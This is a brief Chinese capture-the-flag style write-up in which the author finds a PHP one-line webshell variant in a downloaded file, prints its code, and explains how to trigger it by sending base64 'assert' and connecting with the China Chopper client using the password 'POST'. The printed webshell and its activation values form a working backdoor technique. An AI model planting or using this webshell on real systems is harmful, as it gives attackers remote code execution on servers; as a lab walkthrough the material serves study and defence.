下载文件,找到木马文件
发现一句木马变种
<?php
error_reporting(0);
$e=$_REQUEST['e'];
$arr=array($_POST['POST'],);
array_filter($arr,base64_decode($e));
?>
这句话的意思是,获取url发过来的参数(base64加密过的)保存到$e,菜刀链接密码为POST,array_filter解码并且过滤
如果传入去的是assert,解码过滤后
那么就会构成语句
assert($_post['POST'])
所以拿assert去加密YXNzZXJ0,然后链接密码为POST
菜刀无惧链接
拿到key